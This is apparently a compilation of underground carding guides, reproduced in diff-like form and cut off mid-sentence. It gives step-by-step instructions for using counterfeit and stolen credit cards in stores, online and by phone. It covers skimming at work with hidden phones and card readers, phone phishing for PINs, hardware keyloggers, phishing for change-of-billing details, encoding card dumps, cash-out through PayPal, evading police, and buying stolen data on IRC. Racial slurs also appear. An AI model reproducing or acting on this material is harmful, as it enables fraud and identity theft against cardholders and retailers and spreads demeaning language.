+have just been stolen from a mail box. So,,,rub it a couple times with light sand paper from side to side on
+the front and back to mimic looking like it's been swiped a few times.
+Get a wallet with a flipout holder to put your ID in so there is never an excuse for it to leave your hands
+and never carry more than 4-6 cards in a wallet at one time--just draws extra attention you don't need.
+Carding-it's time to see how good an actor you are.You need to act like this is your card. Whatever
+happens this is your card and you need to stay calm. So,it's time to start working on your social
+engineering skills. The quickest way to get a person to drop their guard and get them to trust you is with a
+good sense of humor and a smile.These cashiers see it all in the 8hrs of misery that is a normal workday
+for them. So,get them smiling and laughing and that pos terminal could say you just killed someone and
+the cashier could care less. In the entire time I've been doing this I manage to encode the wrong dump
+onto matching plastic twice and I remember both times vividly.Firsst time the cashier still had the card in
+her hand when message popped up incorrect last four. We were allready laughing about something else
+and I just said "Good thing your computer waited until closing to crap out on you,,try this one and if there
+is still a problem with it I can just write a check and all she said was as long as it lasted long enough for
+her to ring out with in 5 min she didn't care". Second time was on a saturday morning and I had the card
+still in my hand and read it off and that same error code for wrong last four popped out and all I said
+was"it finally happened I drank so much last night that I forgot how to read and oh shit that was the
+wrong card anyways,,no money on it" Remember guys only criminals run and these guys aren't cops they
+CAN'T touch you unless you hit first,,all they can do is folllow you and call the cops.
+Avoid hitting small chain stores more than one day in a row- They WILL fax out your photo to other
+stores in the area if you hit them repeatedly
+I don't care how many of the same chain store you've been in and they don't check last four-if your
+carding in a new town and going to that same chain--use matching plastic. If they have been hit hard
+before or are in a town with a high crime rate,,they will be checking and avoid the stores in ghettos-your
+just asking for trouble there.
+If you notice the cashier has forgot to charge you for something--point out the mistake and get them to fix
+it! The last thing you want is to be wallking out the door and have the cashier come out after you,,because
+they just noticed the mistake and now you can go back in and try your luck again or give it back with
+possibly your finger prints on it.
+Now for the not so nice shit--if you ever get pulled over by the cops and they ask to search your car you
+say NO everytime they ask you say NO! They say they have you on video using a stolen card,,blah-blah.
+
+You say NO. They can't arrest you without PROOF of a crime. And there is no way the cardholder has
+been down to file a police report within the same day you were using the card.And they can't search your
+property without a warrant. So, as long as there is nothing illegal on you they can arrest you for when
+they pat you down or anything in their computer on you,,your going home that night and allways put shit
+in your trunk,out of sight that way they can't say the so called stolen property was in plain sight,,allways
+use the trunk. And don't lie to them! Remember these statements "Really?,, I don't remember that" or "if
+you say so,,I don't remember" or if your a really greasy shit like me,,you pull out your lawyers business
+card and tell them any questions other than those need to identify you should be asked to him.
+Lastly NEVER-EVER emboss and encode the card holders real name and info on a card! I cannot stress
+this fact enough! If the feds catch you with these cards it is 6 months per card-consecutive! Which means
+10 cards gets you 60 months in club fed,,where if the cardholder name was fake you might have gotten
+off with plea deal of time served and probation with restitution.
+Good luck noobs and stay safe
+Instore Carding Actions
+In-Store Carding, the art of using conterfeit credit cards in order to obtain merchandise from stores. This
+article is for education only and to make those gain more knowledge
+--------------------------------------------------
+/Instore Carding Tips, Tricks,
+--------------------------------------------------
+"First things first:"
+as trustfunded wrote, "this is your card", this is rule number one. you must convince yourself that this is
+your card. being paranoid, scared, or nervous is a perfect way to get busted and tip off a clerk or any
+employee of a store. you must appear like the ordinary customer, just like you were going to buy
+something legit. it is now 2006, the days of dumps working for weeks without a problem are not that
+common. banks are becoming more secure and pushing new methods of fraud tracing out all the time.
+this will not go into how to encode dumps or talk about where to get them. refer to the forum to find this
+kind of stuff.
+"security, the swipe,
+when you go out to card instore it can go two ways. you can succeed or fail. if you succeed you will most
+likely be outside of the store without handcuffs on and some free shit in hand. if you fail, maybe you got a
+decline, call for auth, or maybe in the back of the police cruiser.
+1. Keep your guard up:
+personal security is the most important thing about pulling off one of these operations. be yourself, calm
+voice, do not ever say the word stole/steal/stolen/jacked/hacked in the store. you never know whos
+listening to you! park away from the store, walmart has cameras outside and can see your license plate.
+you may think you got away, but if the bank goes after you the FBI will damn sure see that camera feed.
+
+2. Talk:
+don't be scared to talk to the clerks about products, or anything! if you are very shy then maybe you ought
+to work on snapping out of it, being friendly with the clerk before the big swipe makes a huge difference.
+if pick out a older lady throw a stupid question out there such as "hows your day been" or "has it been
+busy? it has been so crowded everywhere during the holidays". maybe a young guy, "whats goin on man",
+"i went to a party last night and was smashed im so tired". sound stupid? well i'll tell you first hand it isn't,
+it WORKS.
+3. Checkout:
+when you first walk in, always scope out the register. see who is working, what kind of terminal it is (self
+swipe, etc), just so you do not run into something you don't want to mess with, whatever you do, DON'T
+stare over there because it might just make you look stupid or alert somebody because they believe you
+want to rob them or something.
+a. Standing in line
+standing in line just sucks, it really does. don't keep looking behind you. keep your head straight, don't
+laugh for no reason, and most importantly, do not look directly at a camera. talking is not necessary. a cell
+phone might be handy or maybe you can take a look at the product your getting.
+b. the "swipe"
+this is the most important part of instore carding, the swipe. this is where it goes down. if you have to
+hand the card over, go for it. as soon as the clerk swipes pull the hand out trick. put your hand over the
+register acting like you want the card back and most of the time they'll give it back. if not, then ask. you
+WANT, you NEED, you REQUIRE the card back. your prints are there so you better get it. if you self
+swipe, a good trick is to swipe it and put it away as fast as possible. not fast to where your practically
+going 400mph but you get the picture. this makes the clerk hesitate to ask you to see the card, compare
+signatures, whatever. all mind games here.
+c. the "response"
+you can get many results after the swipe, here we go.
+- approved
+you did it, sign that electronic screen or receipt and you are on your way. walk out and get the fuck out of
+there.
+- declined
+your cards fucked. either went too high or maybe it was a pick up. i never a clerk suspect a stolen card so
+i don't know what to suggest. throw them a 2nd card or if you don't have one, ask where an atm is and say
+you'll be back and just leave.
+- call for authorization
+tell that mother fucker you need the card back and all it means is that you went over your limit. if its self
+swipe tell them you have a thing and don't like giving your card to people because your bank said to keep
+it with you or some stupid excuse. calling for authorization on a card is bad news. some will just say
+declined, some will actually say "whats the name of the individual", and since you don't know, you're in a
+hot spot there. you can lie and say its your uncles and he told you to buy it maybe?
+4. "where to go"
+security is a big issue. i won't tell you all to stay away from malls because i shop there but never go back
+once you did it, although they have people walking around but most of the time they are looking for shop
+lifters. they have no reason to suspect you unless your banging out every store there and with a lot of
+people. any person with instore experience knows about the last 4 digits of the card. some POS terminals
+make the clerk type them in. if they don't match you are usually ok. tell them the bank is sending you a
+new card and you are sorry. you assumed you could still use it. radio shack, circuit city, best buy, hot
+topic, office depot(some), do last four. don't go there unless you spent money on matching plastic. good
+places to hit are stores inside of a plaza where there basically is no security besides LE patrolling the area
+
+which is usually fine. gas stations are easy but they can kill the dumps in some cases. pay at the pump is a
+bad idea. i would only recommend it if you were shit broke and needed gas to do more carding. don't
+fucking gas up anywhere with cameras. next thing you know is you carded a brand new computer just to
+get busted for 20 dollars worth of gas.
+good luck to everybody, have a nice thanksgiving everyone
+List sites which charge CC instantly!
+https://secure.hulu.com/plus/buy http://www.anchorfree.com/ Steampowered.com Onlive.com vudu.com
+http://www.tmlewin.co.uk/ http://www.gak.co.uk/ Ea.com www.headblade.com zappos.com
+facebook.com http://www.bigfishgames.com/ Store.origin.com woot.com
+Money from cc to your paypal account
+I'll tell you, how to transfer money from stolen cc to your PP account.
+There is no nothing hard.
+1) Open your paypal
+2) Go to Profile -> My Saved Buttons
+3) Create Button than a certain amount and copy code for email or integrating button on web page.
+4) Found good cc for pp or used hacked account with cc added.
+5) Click on Button which was integrated on web page and open checkout page.
+6) Used good sock and make payment form cc or hacked pp account.
+If everything will be ok, in your account will come money.
+
+Money from cc to your paypal account [Quick Tutorial]
+I'll tell you, how to transfer money from stolen cc to your PP account.
+There is no nothing hard.
+1) Open your paypal
+2) Go to Profile -> My Saved Buttons
+3) Create Button than a certain amount and copy code for email or integrating button on web page.
+4) Found good cc for pp or used hacked account with cc added.
+5) Click on Button which was integrated on web page and open checkout page.
+6) Used good sock and make payment form cc or hacked pp account.
+If everything will be ok, in your account will come money.
+More Carding Terms
+-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is
+with 4 digits (some RARE times with 3)
+-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits
+-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits
+-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits
+(some RARE times with 4)
+-------------------------------------------------------------------------
+Bank-emitent (Issuing bank) - bank which has issued the card
+Billing address - the card owner address
+Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the
+earnings to you.
+Biling - office, which has agreement with a bank. Also this office assumes payments for the cards.
+Card bill - it's a Bank emitent card bill.
+Bank-equirer - bank, in which the store opens the account.
+Merchant account - bank account for accepting credit cards.
+Merchant Bank - bank, through which occur the payments between the buyer and the salesman
+(frequently it is used as synonym "bank-equirer").
+Cardholder - owner of the card.
+
+Validity - suitability card using.
+White plastic - a piece of the pure plastic, where the information is plot.
+CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card
+with the magnetic strip.
+Transaction - charege to the credit card
+POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point.
+PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By
+simple words password for the work with ATM and so on.
+AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its
+holder.
+"Globe" - card holographic gluing with the image of two hemispheres (MasterCard).
+Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA).
+Reader - information reading device for the readout from the magnetic strip of card.
+Encoder - read/write device for the magnetic track of the card.
+Embosser - card symbol extrusion device.
+Card printer - card information printing device.
+Exp.date - card validity period.
+Area code - the first of 3 or 6 numbers of the card owner phone.
+CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card.
+ePlus - program for checking the cards.
+BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card
+and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix".
+Chargeback - the cardholder's bank voids the removal of money from its card.
+Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks.
+Track (road) - a part of the dump with the specific information. Every 1-st track is the information about
+the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card,
+etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other.
+Slip - synonym to the word "cheque" (conformably to card settlings).
+Card balance - money sum that finding on the card account.
+MMN Mothers Maiden Name, important if you want to change the billing address
+some terms:
+Automated Clearing House (ACH) - the automated clearing house. The voluntary association of
+
+depositors, which achieves clearing of checks and electronic units by the direct exchange of means
+between the members of association.
+Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production
+guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the
+design, development, production, servicing and the propagation of the production.
+Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize
+direct buyer account debiting at the moment of the purchase of goods or service.
+Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers,
+which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment
+and at the moment of payment.
+Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.)
+with which the debitor authorizes his financial establishment to debit his current account when obtaining
+of calculation on payment from the indicated creditor.
+Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or
+magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that
+concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale -
+EFT/POS).
+Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means
+transfer purpose from the account of a buyer into the payment on the obligations, which arose in the
+course of transaction at the point of sale.
+Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several
+computer micros-chip or integrated microcircuits for identification and storing of data or their special
+treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for
+delivery of permission for the purchase, account balance checking and storing the personal records. In
+certain cases, the card memory renewal during each use (renewed account balance).
+Internet - the open world communication infrastructure, which consists of the interrelated computer
+networks and which provides access to the remote information and information exchange between the
+computers.
+International Standardisation Organisation (ISO) - International organization, which carries out
+standardization, with the staff office in Geneva, Switzerland.
+Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the
+information, substituted by magnetic inks in the lower part of the check, including the number of check,
+the code of department, sum and the number of account.
+RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and
+Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently
+by the company Security Dynamics Technologies, Inc.
+Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved
+for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment.
+SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary
+purpose is to track individuals for taxation purposes.
+Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the
+calculations.
+
+System risk - the risk, with which the incapacity of one of the payment system participants either
+financial market participants as a whole to fullfill their obligations causes the incapacity of other
+participants or financial establishments to fulfill its obligations (including obligations regarding the
+realization of calculations in means transfer systems) properly. This failure can cause significant liquidity
+or crediting problems and, as result, it can cause loss to the stability of financial markets (with the
+subsequent action on the level of economic activity).
+Truncation - procedure, which makes it possible to limit the physical displacements of a paper document,
+in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of
+entire or part of the information, which is contained on this document (check).
+Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card
+embosser)
+COB - Change of billing. Used for online carding, to change the billing address of a card since Online
+Stores will only ship large items if the billing and shipping address match. You can obtain these from
+vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the
+stores ship items to your drop, since the billing and shipping addresses will match.
+DOB - Date of birth of the card owner
+My Carding Experience
+This is a creepcentral publication
+Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing
+addresses
+Including drops and what you need to know;Huge guide written by me
+kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going
+into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2
+different categories of their own.
+What I'm going to cover:
+Online Carding
+- A quick overview of what online carding is
+- SOCKS and why we use them
+- Finding a cardable site and what cardable means
+- Carding "non cardable websites" with fake CC scans and other fake documents
+Carding while on the job
+- Getting CC, CVV, CVV2 through use of mobiles
+- Skimming whilst on the job
+- Using carbonless receipts to get details (pretty outdated method)
+Trashing
+- Trashing for receipts and credit reports (pretty outdated although still works)
+Phishing over the phone
+
+- Phishing over the phone for details
+Keylogging for CVV2s
+- Hardware keylogging
+Carding Instore
+- What instore carding is (very brief)
+- How it's done
+- How to act and present yourself instore
+Carding over the phone
+- Carding over the phone
+IRC
+- Services provided in IRC
+- Advantages to using IRC for info
+- Disadvantages
+- How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+- Vendors and how to approach them
+- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew
+what they were doing)
+::::WU BUG BULLSHIT and how to rip n00bs and gain more::::
+Phishing for Change of billing
+- What COB is and why it's useful
+- Use through phishing pages
+- Use through keylogging
+Drops and what you need to know about them
+- Drops and what you need to know about them
+[b]What carding is[b]
+Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#,
+CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card
+belongs to along with a signature.
+Online Carding
+Online carding is the purchasing of goods done over the internet with the CVV2.
+Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic
+info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone
+number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC
+number and the CVC (card verification code, which is the 3 digits on the back of the card).
+This is the format you usually get them in when you buy off IRC:
+:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street,
+fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 :::
+SOCKS and why we use them
+Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch
+you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are
+blacklisted by websites and because TOR cycles through various different proxies; and even if you
+configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but
+make sure you're using some constant sock proxies from the same city, town or area that the card is from;
+also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some
+searching around yourself for a highly trusted one and one which won't comply with LE).
+
+You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time),
+that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with
+some Nigerian dude who became selfish).
+So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH
+proxies everytime you card.
+Finding a cardable site and what cardable means
+Basically a cardable site holds these characteristics and what you should be looking for to determine an
+easily "cardable" website:
+- The top one you need to look for on the site's TOS is that they send to any address and not just the one
+registered on the card (although you can easily get around this if they don't, with a COB, photoshopped
+verification (will go into detail later) or some social engineering over the phone).
+- The next important to look for is if they have a visa verification code or mastercard secure code (most of
+the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of
+these you have to put in and you don't have them then don't waste your time
+- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to
+your local drop)
+- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site
+in the UK that has all these qualities including this one, it is perfect for carding clothes)
+- Also you can't forget to see what other security checks they need to do (if they need to call you up to
+verify or want a utility bill, passport or a scan of the actual CC)
+It is hard to find websites online now that have most of these qualities, therefore we have to use COBs
+and photoshop to help us along the way, which is what I'll go into now.
+Carding "non cardable websites" with fake CC scans and other fake documents
+Okay so say you come across a site that will deliver to another house not registered on the card, but they
+want verificaton either through phone or scans of a utility bill, credit card or passport.
+For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia
+3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's
+details you're using is local to you and you're daring then go to their home and beige box from there; it'd
+be very convincing.
+If they speak to you over the phone have all details in your mind about the item you're carding, have some
+bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it
+there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites
+at the same time it's easy to get them mixed up, so make sure who it is calling you 1st.
+For CC scans and how to do them check the attachments at the end of this file, they explain so much
+better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt
+them a little bit so it does actually look like a scan. To make it even more believable put some paper in the
+scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the
+front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same
+goes for utility bills (can be got through trashing or your own, and then edited in PS).
+Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give
+you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram
+image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm
+working on getting a good one soon.
+Carding whilst on the job
+Getting CC, CVV, CVV2 through use of mobiles
+
+Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust
+anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of
+people around flashing off their plastic cash and using them freely without a care in the world. The most
+common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's
+and all the other trendy shops.
+Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they
+bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think
+again when they take your credit card and go under the desk with it to get the keypad, they are doing
+more than just that; just because they're not taking the card and running off with it does not mean they're
+not stealing your information. A friend of my dad used to card and work in a clothing store, he used to
+have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh,
+unfortunately he began doing it too much and because he'd gotten away with it so many times he became
+careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be
+careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the
+max, and you don't know exactly if you're pressing over the info of another card already put on to the play
+doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden
+days.
+But there is a new wonderful invention called cameras, video recording, and mobile phones and they are
+even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at
+least over 2 megapixel and allows long enough video recording times. The phone is set to video record
+and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all
+the information you need, as well as being quick you can get a lot more than 2 on, depending on how long
+each recording lasts, you may need to start more than one recording.
+You need good reason to be going under the desk to get the chip and pin machine, so make the desk look
+cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you
+could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so
+you need to get the other one, take their card and then go under searching the desk and quickly show it to
+the camera phone and then get the chip and pin machine and put the card in it and then hand to the
+customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online.
+Skimming whilst on the job
+For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of
+course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on
+writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but
+embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and
+buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch
+out).
+If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're
+a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep
+hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much
+easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as
+much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be
+giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving
+it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their
+card out of sight with them. I guess you could do that technique with clothing retail too when you get
+their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend
+shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone
+and pretend to have them talking on the phone while really they're recording the person next to them
+putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear
+[5mpixel]).
+I'll go into detail what to do with the dumps you have later in the instore carding section.
+
+Using carbonless receipts to get details (pretty outdated method)
+If the store you work at hasn't gone carbonless on the transactions information then you can get most of
+the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you
+get it.
+Trashing
+Trashing for receipts and credit reports (pretty outdated although still works)
+Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd
+be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their
+financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All
+on forms people couldn't be bothered to dispose of properly because they thought they were JUST old
+records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear
+rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from
+work as well). But also from this if there is not enough info for you on the forms then there is definitely
+the phone number of the mark on the form that they've scrapped; almost always, and if not then there is
+enough info on their to look them up in the phone directory. Then of course you use social engineering
+skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then
+go trashing in the bins at the back of the store for the receipts with the credit card details on it.
+Phishing over the phone
+Phishing over the phone for details
+Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung
+up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are
+people actually stupid enough to fall for these obvious scams. Even more people fall for this if they
+believe that the caller is from the credit card company itself or part of the secret service or credit fraud
+investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If
+you sound professional or part of an important group such as investigations then people are more likely to
+comply with you if they believe that their card has been used for credit fraud purposes and have to give
+their credit card info and billing address for verification. The best time to call up the mark is when they
+are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get
+back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they
+question you. Play along well to the part you're pretending to be. Some social engineering skills are
+required and you must gain the experience of lying to people yourself. Before calling up the person find
+out as much information about them as you can.
+If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell
+them there has been some suspicious charges made to the credit card from places such as South Africa,
+Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out
+of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may
+as well, it'll make it easier to get a COB for you to use).
+You can also get their PIN out of them if you want as well by either straight out asking them to confirm
+it, or be crafty and after you've told them to verify their PIN you're putting them through to a different
+department; then play some cheesy music down the phone for a few mins, have a female voice recording
+(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get
+these recorded so they can be decoded with DTMF decoding hardware/software later (although it's
+expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like,
+it's preferred to use decoding software to ensure you have it correct.
+If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for
+this).
+Keylogging for CVV2s
+Hardware keylogging
+First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer
+
+belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals
+etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or
+maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers
+from here:
+http://tyner.com/datalogger/keykatcher.htm
+And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as
+to not look suspicious just coming in and then leaving a few seconds later).
+Or of course you could set one up in a business and do the classic call in and do some social engineering
+from the credit card company or secret service and have them go to the bank online and have them log in
+to verify, or maybe even have them log in to a fake bank online made by yourself that will collect
+anyone's info who logs in on it.
+Carding Instore
+Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece
+of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the
+PIN as well through whatever method you choose to use.
+How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is
+the best to use). And you do it like this:
+Written by: Acetrace
+1. Load up thejerms software
+2. hit settings tab
+3. hit "Defaults" in Leading Zeros box
+4. hit "75 bpi" in Set Track 2 density box
+5. go bak to actions
+6. hit LoCo or HiCo in Coercivity box, depending on which you want to do
+7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you)
+8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went
+ok)
+9. GO SHOPPING!!!
+Download thejerm from here:
+Code:
+Now how you should act when you go carding instore is pretty much common sense, but some people get
+caught up in the moment with nerves, cockiness or just too much weird amounts of excitement.
+Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be
+stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart
+for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would look
+suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in with
+style. When you go instore, you ACT like you are using your own card, because essentially that's what it
+is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras mean
+nothing anyway, they don't know your name or where you live, they're not being watched half of the time,
+so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you go in,
+don't rush take your time, browse around some other items. Find the item you want to card and even ask
+
+the employee simple questions about it (if it's a TV or comp just ask questions about certain specs and if
+it's good for playing video games on). You'll be most nervous at the checkout, just act as normal as you
+always have been, don't make too much small talk but be polite and civil. Once you have the good sin
+your hands don't bolt out the door, just say thank you and then casually walk out the door, get to your car
+and then celebrate all you want.
+The following users say "It is so good to hear it!":
+Carding over the phone
+Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you
+could use a beige box and call from someone else's phone but that's a totally different game all together
+and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple
+and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the
+year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though
+) to call them up. Do not put on a stupid voice at all, the salesman/woman will know and it'll be a cause
+for investigation during the mailing of the goods or the requesting of them. Just be calm, cool and talk to
+them as you normally would if you were ordering with your own card. They'll ask for a name, name as it
+appears on card, phone number, billing address, expiration date, method of shipping, and the product that
+you want to buy. Also when trying to not seem so shifty be sure to ask questions such as if they can
+deliver the next day or 1st class, and if they can order it to your "relatives" house so that it can be there
+for their birthday; maybe even ask if they can write a message to go with the gift as well on your behalf .
+The next day postage is said so that they have less time to look up details on the order. Some cards will
+have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start
+to question you then just answer the questions and talk your way around the situation with your social
+engineering skills; don't just run away from the questions or hang up straight away, otherwise that is
+cause for suspicion and they may investigate. If all goes well you should have your item of choice
+delivered to your drop location or a house of someone else's address who you don't know and call them
+up saying that you called up the store and they've sent the package to the wrong address and it is still
+sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after
+work (this is a last resort and only to be tried if you're good at talking to people, which you should be if
+you're a carder). I recommend checking out the section on drops later on in this text.
+I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send
+without some verification which is usually the case).
+IRC
+Services provided in IRC
+IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE
+black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off
+IRC from CP to warez to CC details (which is what we want).
+To concentrate on carding though you can buy:
+CVVs
+CVV2s
+SSNs
+Utility bill scans
+CC scans
+COB (a service to get someone to call up the victim's bank and get the billing address changed to your
+drop)
+Payment for using someone else's drop and then sending to you
+Spyware
+Fake ID/ ID scans
+DUMPZ
+Phisher pages
+
+The list really is endless
+There are a lot of advantages to using IRC networks and channels which I'll go into now:
+- The channels are often underground and not known to many people, so they're harder to stumble upon
+by some random guy.
+- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing
+the traffic. This makes it harder for investigators to uncover.
+- Easier and quicker to communicate with mass amounts of like minded people.
+- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made
+every second, guaranteed).
+- And of course a varity of services, if you need something you can bet someone from the other side of
+the world will be willing to share or/and sell to you.
+There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you
+stay cautious, here's what you should be weary of:
+- Viruses
+- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and
+NOD32 are what you want)
+- Do not accept random .exes or any file for that matter
+- It is easy to get ripped off, choose your forms of payments and who you deal with wisely
+How to find carding channels (Will not go too much into this as there are secrets between fellow carders
+which we like people interested enough to find out for themselves)
+Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find
+these channels?
+If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is
+where I found out about a lot of the carder channels I used, also how I found out about forums and their
